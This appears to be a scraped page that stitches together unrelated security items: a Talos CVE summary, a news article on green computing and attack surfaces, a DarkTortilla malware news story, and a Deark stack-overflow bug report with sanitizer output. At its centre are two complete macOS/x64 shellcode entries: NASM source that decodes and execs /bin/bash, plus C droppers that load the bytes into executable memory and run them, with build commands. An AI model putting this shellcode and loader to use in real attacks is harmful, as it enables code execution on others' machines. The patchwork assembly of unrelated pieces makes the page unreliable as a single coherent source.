An information disclosure vulnerability exists in the OpenImageIO::decode_iptc_iim() functionality of OpenImageIO Project OpenImageIO v2.3.19.0. A specially-crafted TIFF file can lead to a disclosure of sensitive information. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-41988: TALOS-2022-1643 || Cisco Talos Intelligence Group

Less is often more when it comes to both infosec and eco-friendly computing practices

Adam Bannister 22 December 2022 at 15:35 UTC  
Updated: 22 December 2022 at 15:42 UTC

Less is often more when it comes to both infosec and eco-friendly computing practices

Reducing the carbon footprint of computing architecture could play a role not just in tackling climate change but another growing, borderless threat too – cyber-attacks.

That’s according to co-authors of a white paper that highlights how best practices for making cloud infrastructure secure and sustainable sometimes happily overlap with the common pursuit of efficiencies.

“The lowest hanging fruit for sustainability is to do less and save less data, which should also reduce attack surfaces,” Anne Currie, co-author of draft paper ‘The State of Green Cloud Software Practices’ and community chair at Green Software Foundation, told The Daily Swig.

Read more of the latest news about secure development

Fellow co-author Paul Johnston, founder of UK tech consultancy Roundabout Labs and former senior developer advocate for serverless at Amazon Web Services (AWS), echoes these sentiments.

“My take is that generally, greener means fewer lines of code and that means smaller attack surface,” he told The Daily Swig. Johnston said this also means “better use of managed services which, again, generally means that your attack surface is reduced (services tend to be better for infosec)”.

Shutting down defunct applications and services has the same effect. “Unmaintained, zombie, workloads are bad for the environment as well as being a security risk,” reads the white paper, which also has contributors from Red Hat, Microsoft, and the Green Web Foundation.

**Memory-safe languages**

Developers are urged to “rewrite code to use a more lightweight framework or language. Moving from Python to Rust could result in a 10-fold cut in CPU requirements, for example,” says the white paper. This could have security benefits insofar as Rust is, unlike Python, memory safe by default.

The white paper also endorses Golang as “an efficient language and easier than the classic HPC options of C or C++”.

Again, there is some positive correlation here with security best practices given the US National Security Agency (NSA) recently urged (PDF) organizations to abandon languages lacking “inherent memory protection, such as C/C++”, in favor of memory-safe alternatives like Golang, C#, Java, Ruby, and Swift.

Indeed, C and C++ have been blamed for the fact 70% of Microsoft and Google Chrome flaws are memory safety vulnerabilities.

Rust is seen as considerably more energy-efficient than Python

**Security and C, C++**

However, it’s perhaps reductive to conclude that ‘lightweight’ languages – generally defined in terms of syntax, memory footprint, and implementation complexity – are inherently more secure or sustainable in every context.

After all, it’s perfectly possible to write a super-efficient, ‘green’ program in C++, but this is obviously contingent on the developer’s aptitude.

“Vulnerabilities are less likely if the language constructs make it so the easy or obvious way either can’t or is unlikely to be a vulnerability,” David A Wheeler, director of open source supply chain security at the Linux Foundation, told The Daily Swig.

DON’T MISS ‘We don’t teach developers how to write secure software’: David A Wheeler on reversing CVE surge

“C is a relatively simple programming language in the sense that it has relatively few constructs; in that view, it’s lightweight. However, many operations in C (array deference, pointer assignment, or dereference, etc) provide no automatic protections, so any mistake can quickly lead to a vulnerability.

“In contrast, C++ is a much larger and more complex language than C,” continued Wheeler. “In at least some measures it wouldn’t be considered lightweight. However, its lack of many safety mechanisms by default leads to the same problems.”

**Managed cloud services**

Managed cloud services are also endorsed by the sustainable computing white paper because, among other things, they offer high compute density and autoscaling via serverless services.

Yet some enterprises are still nervous about moving data security into shared environments. Ann Currie, a software engineer as well as sci-fi author, considers these fears completely unjustified.

“The cloud puts way more effort into infosec than companies,” says Currie. “It’s a classic area where specialists kick the butt of the (usually) generalists in enterprises.”

Nevertheless, Paul Johnston warns that delegating security functions does create risks.

Catch up with the latest articles about security best practices

“The benefits of a ‘greener’ approach (even if unintentional) are very positive from an infosec view,” he explains.

“However, there is a possible downside in that the security side that you resolve by using managed services or by reducing code can then lead to an element of complacency about the elements that are often a little more complicated.”

The white paper also recommends “moving more work to the client or edge”, which generates security challenges, albeit solvable ones, by extending the attack surface beyond the data center.

Another sustainability goal is surely an unequivocal plus for security. Currie, Johnston, and their fellow co-authors envisage a future where firmware remains backwards-compatible with devices that are at least 10 years old – keeping users protected by security patches for longer.

**Eco incentives**

Compliance and shareholder pressures plus lower running costs surely persuaded tech giants like Microsoft to set ambitious targets for becoming fully carbon neutral or even carbon negative.

Nevertheless, Currie suspects the potentially dire reputational and financial costs of neglecting cybersecurity are an even stronger incentive for change.

“Getting sustainability to the top of the priority list is harder than getting security there,” she says. “The good news is cloud managed services are usually fairly sustainable and secure.”

In other words: anyone trying to persuade organizations to make their computing practices greener would be wise to flag any incidental security benefits when doing so.

RECOMMENDED Deserialized WebSec roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs

Lean, green coding machine: How sustainable computing drive can reduce attack surfaces

286 bytes small macOS/x64 execve Caesar cipher string null-free shellcode.

    # Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes)# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7# Date: 12/20/2022# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64# Shellcode Description:# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00.# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! # Compile & run:#     nasm -f macho64 execve.asm -o execve#     for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo#  # Add shellcode to dropper.c#     gcc dropper.c -o dropper#     sh-3.2$ pstree -p $(echo $$) | grep $$#       \-+= 28533 bobby sh#     sh-3.2$ ./dropper #       [+] testcode Length: 286 Bytes#       [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000#       [+] Executing testcode at 0x10b030000#     bobby$ pstree -p $(echo $$) | grep -B1 $$#       \-+= 28533 bobby sh#         \-+= 28584 bobby (bash)bits 64global _main_main:  create_stackframe:    push rbp           ; push current base pointer to the stack    mov rbp, rsp       ; Set Base Stack Pointer for new Stack-Frame    sub rsp, 0x60      ; create space for string    mov [rbp-0x8], rsp ; Save destination string buffer address    jmp short lilypad_1; char * string eggHunter(egg);;     RAX                 RDIa; description: starts searching for the supplied egg starting from the callers return addresseggHunter:  mov rcx, [rsp]    ; start the egghunter from the caller function return address  hunt:    inc rcx         ; move to the hunter to the next byte    cmp [rcx], di   ; did we find the first  egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; move hunter to 2nd egg location    cmp [rcx], di   ; did we find the second egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; both eggs found! Move hunter +2 to return the start of buffer addr    xchg rax, rcx   ; return start of string address    ret; int length strsize(&string, terminator);;      RAX              RDI        RSI; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.strsize:  xor rax, rax      ; clear register  xor rcx, rcx      ; set the counter to zero  strsize_loop:    mov rcx, rdi    ; start of string address    add rcx, rax    ; current memory location of char in string    cmp [rcx], sil  ; is this the null terminator?    je strsize_return    prevent_infinite_loop:      cmp ax, 0x1001          ; compare value in RAX to 0x1001 (prevent infinite mem scanning)      jg strsize_fail2find    ; if value in RAX is greater, jump to label    inc rax                   ; move to the next char in the string    jmp strsize_loop  strsize_fail2find:    xor rax, rax    ; return null/ 0x0  strsize_return:    retlilypad_1:  jmp short lilypad_2; char * string terminateString(&string, terminator);;     RAX                          RDI        RSI; description: Finds the string terminator and changes it to a null byteterminateString:  xor rcx, rcx      ; set the counter to zero  mov rcx, rdi      ; start address to look for terminator  loop_find_terminator:    cmp [rcx], sil  ; is this the null terminator?    je found_terminator    inc rcx         ; move to the next char in the string    jmp loop_find_terminator  found_terminator:    mov [rcx], al    ret; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);;        RAX                         RDI             RSI              RDX; description: Move memory from source address to destination address;  ARG1 - RDI: destination address;  ARG2 - RSI: source address;  ARG3 - RDX: size of the memorymove_memory:  ; Loop through memory and move each byte from source to destination  push rdi                 ; save the destination address so we can return it at the end  xor rax, rax             ; register to temporarily hold the byte we are copying  move_memory_loop:    mov al, [rsi]          ; read the byte from source address into the temporary register    mov [rdi], al          ; write the byte at the destination address    inc rsi                ; increment source address    inc rdi                ; increment destination address    dec rdx                ; decrement memory size    jnz move_memory_loop   ; repeat loop until memory size is 0  ; Return to caller  pop rax                  ; return the destination address of the memory to the caller  retlilypad_2:  jmp short lilypad_3; void clear_memory(void *dst_addr, size_t mem_size);;                         RDI              RSI; description: Writes 0x00 bytes to a destination address;  ARG1 - RDI: a pointer to the destination address;  ARG2 - RSI: the size of the memory to be written toclear_memory:  mov rcx, rsi     ; load memory size from second argument into rcx  xor rax, rax  ; Loop through memory and write 0x00 to each byte in destination address  clrmem_loop:    mov byte [rdi], al   ; write 0x00 to byte in destination address    inc rdi              ; increment destination address    dec rcx              ; decrement memory size    jnz clrmem_loop      ; repeat loop until memory size is 0    ret ; Return to caller; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);;                                  RDI                        RSI                RDXbasicCaesar_Decrypt:  bcd_loop:    sub [rsi], dl  ;  Subtract the value of dl from the memory location pointed to by RSI    inc rsi        ;  Increment RSI to point to the next character    dec rdi        ;  Decrement stringLength counter    test rdi,rdi   ;  Test if stringLength counter is zero    jnz bcd_loop   ;  If stringLength counter is not zero, jump back to the beginning of the loop  ret ; Return to callerlilypad_3:  ; *string = eggHunter(egg); Starts hunt from return address of caller  find_execve_string:     xor rdi, rdi        ; clear register    mov  di, 0xBCB0     ; Arg 1: Our egg    call eggHunter      ; returns string start address    mov [rbp-0x10], rax ; Save string address  get_strlen:    mov rdi, [rbp-0x10]    ; Arg 1: string start address    xor rsi, rsi           ; clear register    mov sil, 0xFF          ; Arg 2: string terminator    call strsize ; returns string size    mov [rbp-0x18], rax    ; Save string size        ; move_memory(dst_addr, src_addr, mem_size);  ;               RDI       RSI       RDX  copy_str2stack:    mov rdi, [rbp-0x8]      ; Arg 1: String buffer on stack    mov rsi, [rbp-0x10]     ; Arg 2: Original string location    mov rdx, [rbp-0x18]     ; Arg 3: size    call move_memory  ; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);  ;                             RDI                        RSI                RDX  do_caesar_cipher_decrypt:    mov rdi, [rbp-0x18]       ; Arg 1: string size    mov rsi, [rbp-0x8]        ; Arg 2: String buffer on stack    xor rdx, rdx              ; clear register    add dl, 0x7               ; Arg 3: Ceaser Chiper Key: 7    call basicCaesar_Decrypt  ; returns string size  do_terminate_string:    mov rdx, [rbp-0x18]     ; string size    mov rdi, [rbp-0x8]      ; String buffer on stack    add rdi, rdx            ; Arg 1: string terminator location    xor rsi, rsi            ; clear register    mov sil, 0x1            ; Arg 2: mem size to null    call clear_memory       ; returns string size  ; execve("/bin/bash",NULL,NULL)  execve:    mov  rdi, [rbp-0x8]  ; Arg 1: String buffer on stack      xor  rsi, rsi        ; Arg 2: NULL    xor  rdx, rdx        ; Arg 3: NULL    xor  rax, rax        ; clear register for syscall number setup    mov  al, 0x2         ; set a bit in register    ror  rax, 0x28       ; move the bit over 28 bits to the right in the register    mov  al, 0x3b        ; set the lower byte (AL) of the RAX register to the execve syscall number    syscall              ; do the syscall interrupt    fixstack:    add rsp, 0x60    ; clear allocated stack space    pop rbp          ; restore stack base pointer    ret              ; return to caller; ~~ Ceaser Chiper String Cryptor ~~; Original String:   /bin/bash; String Length:     9; Ceaser Chiper Key: 7; Chiper String:     6ipu6ihzo; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f};; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f";; Dechipered String: /bin/bashshell_path_string:  db  0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF###########################################################################################################################################// dropper.c#include <stdio.h>#include <sys/mman.h>#include <string.h>#include <stdlib.h>int (*execute_testcode)();const unsigned char testcode[] = "\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff";int main() {    size_t testcode_size = sizeof(testcode);    printf("[+] testcode Length: %lu Bytes\n", testcode_size);      void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);     if (rwx_memory == MAP_FAILED) {        printf("[!] Failed to allocate RWX memory\n");        perror("mmap");        exit(-1);    }     printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory);    memcpy(rwx_memory, testcode, sizeof(testcode));    execute_testcode = rwx_memory;     printf("[+] Executing testcode at %p\n",rwx_memory);    execute_testcode();    return 0;}

macOS/x64 Execve Caesar Cipher String Null-Free Shellcode 

253 bytes small macOS/x64 execve null-free shellcode.

    # Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7# Date: 12/20/2022# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64# Shellcode Description:# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! # Compile & run:#     nasm -f macho64 execve.asm -o execve#     for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo#  # Add shellcode to dropper.c#     gcc dropper.c -o dropper#     sh-3.2$ pstree -p $(echo $$) | grep $$#           \-+= 56862 bobby sh#     sh-3.2$ ./dropper#         [+] Shellcode Length: 253 Bytes#         [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000#         [+] Executing shellcode at 0x10e643000#     bobby$ pstree -p $(echo $$) | grep -B1 $$#           \-+= 56862 bobby sh#             \-+= 57021 bobby (bash)bits 64global _main_main:  create_stackframe:    push rbp           ; push current base pointer to the stack    mov rbp, rsp       ; Set Base Stack Pointer for new Stack-Frame    sub rsp, 0x60      ; create space for string    mov [rbp-0x8], rsp ; Save destination string buffer address    jmp short lilypad_1; char * string eggHunter(egg);;     RAX                 RDI; description: starts searching for the supplied egg starting from the callers return addresseggHunter:  mov rcx, [rsp]    ; start the egghunter from the caller function return address  hunt:    inc rcx         ; move to the hunter to the next byte    cmp [rcx], di   ; did we find the first  egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; move hunter to 2nd egg location    cmp [rcx], di   ; did we find the second egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; both eggs found! Move hunter +2 to return the start of buffer addr    xchg rax, rcx   ; return start of string address    ret; int length strsize(&string, terminator);;      RAX              RDI        RSI; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.strsize:  xor rax, rax      ; clear register  xor rcx, rcx      ; set the counter to zero  strsize_loop:    mov rcx, rdi    ; start of string address    add rcx, rax    ; current memory location of char in string    cmp [rcx], sil  ; is this the null terminator?    je strsize_return    prevent_infinite_loop:      cmp ax, 0x1001          ; compare value in RAX to 0x1001 (prevent infinite mem scanning)      jg strsize_fail2find    ; if value in RAX is greater, jump to label    inc rax                   ; move to the next char in the string    jmp strsize_loop  strsize_fail2find:    xor rax, rax    ; return null/ 0x0  strsize_return:    retlilypad_1:  jmp short lilypad_2; char * string terminateString(&string, terminator);;     RAX                          RDI        RSI; description: Finds the string terminator and changes it to a null byteterminateString:  xor rcx, rcx      ; set the counter to zero  mov rcx, rdi      ; start address to look for terminator  loop_find_terminator:    cmp [rcx], sil  ; is this the null terminator?    je found_terminator    inc rcx         ; move to the next char in the string    jmp loop_find_terminator  found_terminator:    mov [rcx], al    ret; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);;        RAX                         RDI             RSI              RDX; description: Move memory from source address to destination address;  ARG1 - RDI: destination address;  ARG2 - RSI: source address;  ARG3 - RDX: size of the memorymove_memory:  ; Loop through memory and move each byte from source to destination  push rdi                 ; save the destination address so we can return it at the end  xor rax, rax             ; register to temporarily hold the byte we are copying  move_memory_loop:    mov al, [rsi]          ; read the byte from source address into the temporary register    mov [rdi], al          ; write the byte at the destination address    inc rsi                ; increment source address    inc rdi                ; increment destination address    dec rdx                ; decrement memory size    jnz move_memory_loop   ; repeat loop until memory size is 0  ; Return to caller  pop rax                  ; return the destination address of the memory to the caller  retlilypad_2:  jmp short lilypad_3; void clear_memory(void *dst_addr, size_t mem_size);;                         RDI              RSI; description: Writes 0x00 bytes to a destination address;  ARG1 - RDI: a pointer to the destination address;  ARG2 - RSI: the size of the memory to be written toclear_memory:  mov rcx, rsi     ; load memory size from second argument into rcx  xor rax, rax  ; Loop through memory and write 0x00 to each byte in destination address  clrmem_loop:    mov byte [rdi], al   ; write 0x00 to byte in destination address    inc rdi              ; increment destination address    dec rcx              ; decrement memory size    jnz clrmem_loop      ; repeat loop until memory size is 0  ; Return to caller  retlilypad_3:  ; *string = eggHunter(egg); Starts hunt from return address of caller  find_execve_string:     xor rdi, rdi        ; clear register    mov  di, 0xBCB0     ; Arg 1: Our egg    call eggHunter      ; returns string start address    mov [rbp-0x10], rax ; Save string address  get_strlen:    mov rdi, [rbp-0x10]    ; Arg 1: string start address    xor rsi, rsi           ; clear register    mov sil, 0xFF          ; Arg 2: string terminator    call strsize ; returns string size    mov [rbp-0x18], rax    ; Save string size        ; move_memory(dst_addr, src_addr, mem_size);  ;               RDI       RSI       RDX  copy_str2stack:    mov rdi, [rbp-0x8]      ; Arg 1: String buffer on stack    mov rsi, [rbp-0x10]     ; Arg 2: Original string location    mov rdx, [rbp-0x18]     ; Arg 3: size    call move_memory  do_terminate_string:    mov rdx, [rbp-0x18]     ; string size    mov rdi, [rbp-0x8]      ; String buffer on stack    add rdi, rdx            ; Arg 1: string terminator location    xor rsi, rsi            ; clear register    mov sil, 0x1            ; Arg 2: mem size to null    call clear_memory       ; returns string size  ; execve("/bin/bash",NULL,NULL)  execve:    mov rdi, [rbp-0x8]  ; Arg 1: String buffer on stack      xor  rsi, rsi       ; Arg 2: NULL    xor  rdx, rdx       ; Arg 3: NULL    xor  rax, rax       ; clear register for syscall number setup    mov  al, 0x2        ; set a bit in register    ror  rax, 0x28      ; move the bit over 28 bits to the right in the register    mov  al, 0x3b       ; set the lower byte (AL) of the RAX register to the execve syscall number    syscall             ; do syscall interrupt    fixstack:    add rsp, 0x60    ; clear allocated stack space    pop rbp          ; restore stack base pointer    ret              ; return to callershell_path_string:  db  0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF###########################################################################################################################################// dropper.c#include <stdio.h>#include <sys/mman.h>#include <string.h>#include <stdlib.h>int (*execute_shellcode)();const unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff";int main() {    size_t shellcode_size = sizeof(shellcode);    printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);      void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);     if (rwx_memory == MAP_FAILED) {        printf("[!] Failed to allocate RWX memory\n");        perror("mmap");        exit(-1);    }     printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);    memcpy(rwx_memory, shellcode, sizeof(shellcode));    execute_shellcode = rwx_memory;     printf("[+] Executing shellcode at %p\n",rwx_memory);    execute_shellcode();    return 0; }

macOS/x64 Execve Null-Free Shellcode

As more and more users adopt new versions of Microsoft Office, it is likely that threat actors will turn away from VBA-based malicious documents to other formats such as XLLs or rely on exploiting newly discovered vulnerabilities to launch malicious code.

Threat Spotlight: XLLing in Excel - threat actors using malicious add-ins

Sites spoofing Grammarly and a Cisco webpage are spreading the DarkTortilla threat, which is filled with follow-on malware attacks.

Researchers have spotted two phishing sites — one spoofing a Cisco webpage and the other masquerading as a Grammarly site — that threat actors are using to distribute a particularly pernicious piece of malware known as "DarkTortilla."

The .NET-based malware can be configured to deliver various payloads and is known for functions that make it extremely stealthy and persistent on the systems it compromises.

Multiple threat groups have been using DarkTortilla since at least 2015 to drop information stealers and remote access Trojans, such as AgentTesla, AsyncRAT and NanoCore. Some ransomware groups too — such as the operators of Babuk — have used DarkTortilla as part of their payload delivery chain. In many of these campaigns, attackers have primarily used malicious file attachments (.zip, .img, .iso) in spam emails to wrap up unsuspecting users in the malware.

**DarkTortilla Delivery Via Phishing Sites**

Recently, researchers at Cyble Research and Intelligence Labs identified a malicious campaign where threat actors are using two phishing sites, masquerading as legitimate sites, to distribute the malware. Cyble surmised that the operators of the campaign are likely using spam email or online ads to distribute links to the two sites.

Users who follow the link to the spoofed Grammarly website end up downloading a malicious file named "GnammanlyInstaller.zip" when they click on the "Get Grammarly" button. The .zip file contains a malicious installer disguised as a Grammarly executable that drops a second, encrypted 32-bit .NET executable. That in turn downloads an encrypted DLL file from an attacker-controlled remote server. The .NET executable decrypts the encrypted DLL file and loads it into the compromised system's memory, where it executes a variety of malicious activities, Cyble said.

The Cisco phishing site meanwhile looks like a download page for Cisco's Secure Client VPN technology. But when a user clicks on the button to "order" the product, they end up downloading a malicious VC++ file from a remote attacker-controlled server instead. The malware triggers a series of actions that end with DarkTortilla installed on the compromised system.

Cyble's analysis of the payload showed the malware packing functions for persistence, process injection, doing antivirus and virtual machine/sandbox checks, displaying fake messages, and communicating with its command-and-control (C2) server and downloading additional payloads from it.

Cyble's researchers found that to ensure persistence on an infected system for instance, DarkTortilla drops a copy of itself into the system's Startup folder and creates Run/Winlogin registry entries. As an additional persistence mechanism, DarkTortilla also creates a new folder named "system\_update.exe" on the infected system and copies itself into the folder.

**Sophisticated & Dangerous Malware**

DarkTortilla's fake message functionality meanwhile basically serves up messages to trick victims into believing the Grammarly or Cisco application they wanted failed to execute because certain dependent application components were not available on their system.

"The DarkTortilla malware is highly sophisticated .NET-based malware that targets users in the wild," Cyble researchers said in a Monday advisory. "The files downloaded from the phishing sites exhibit different infection techniques, indicating that the \[threat actors\] have a sophisticated platform capable of customizing and compiling the binary using various options."

DarkTortilla, as mentioned, often acts as a first-stage loader for additional malware. Researchers from Secureworks' Counter Threat Unit earlier this year identified threat actors using DarkTortilla to mass distribute a wide range of malware including, Remcos, BitRat, WarzoneRat, Snake Keylogger, LokiBot, QuasarRat, NetWire, and DCRat.

They also identified some adversaries using the malware in targeted attacks to deliver Cobalt Strike and Metasploit post-compromise attack kits. At the time, Secureworks said it had counted at least 10,000 unique DarkTortilla samples since it first spotted a threat actor using the malware in an attack targeting a critical Microsoft Exchange remote code execution vulnerability (CVE-2021-34473) last year.

Secureworks assessed DarkTortilla as being very dangerous because of its high degree of configurability and its use of open source tools like CofuserEX and DeepSea to obfuscate its code. The fact that DarkTortilla's main payload is executed entirely in memory is another feature that makes the malware dangerous and difficult to spot, Secureworks noted at the time.

Sophisticated DarkTortilla Malware Serves Imposter Cisco, Grammarly Pages

Deark v.1.6.2 was discovered to contain a stack overflow via the do_prism_read_palette() function at /modules/atari-img.c.

**Description**

A stack-buffer-overflow bug was discovered in function do\_prism\_read\_palette modules/atari-img.c:331

**Version**

Version v1.6.2 (Lastest commit)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce**

Command

    git clone the Lastest Version firstly.
    make && make install
    ./deark -l -zip ./poc
    

POC file at the bottom of this report.

**ASAN Report**

    Module: prismpaint
    =================================================================
    ==20784==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc6490a820 at pc 0x55eae0de20ff bp 0x7ffc6490a390 sp 0x7ffc6490a380
    READ of size 4 at 0x7ffc6490a820 thread T0
        #0 0x55eae0de20fe in do_prism_read_palette modules/atari-img.c:331
        #1 0x55eae0de247e in de_run_prismpaint modules/atari-img.c:361
        #2 0x55eae0fd7023 in de_run_module src/deark-util.c:878
        #3 0x55eae0fd7023 in de_run_module src/deark-util.c:843
        #4 0x55eae1036a35 in de_run src/deark-user.c:452
        #5 0x55eae0dc39e9 in main2 src/deark-cmd.c:988
        #6 0x55eae0dc39e9 in main src/deark-cmd.c:1022
        #7 0x7fd587ac4082 in __libc_start_main ../csu/libc-start.c:308
        #8 0x55eae0dc652d in _start (/AFLplusplus/my_test/deark/backup/asan/deark-master/deark+0xf652d)
    
    Address 0x7ffc6490a820 is located in stack of thread T0 at offset 1056 in frame
        #0 0x55eae0de1c7f in do_prism_read_palette modules/atari-img.c:304
    
      This frame has 2 object(s):
        [32, 1056) 'pal1' (line 308) <== Memory access at offset 1056 overflows this variable
        [1184, 1216) 'tmps' (line 310)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow modules/atari-img.c:331 in do_prism_read_palette
    Shadow bytes around the buggy address:
      0x10000c9194b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000c919500: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10000c919510: f2 f2 f2 f2 00 00 00 00 f3 f3 f3 f3 00 00 00 00
      0x10000c919520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    
    

**POC**

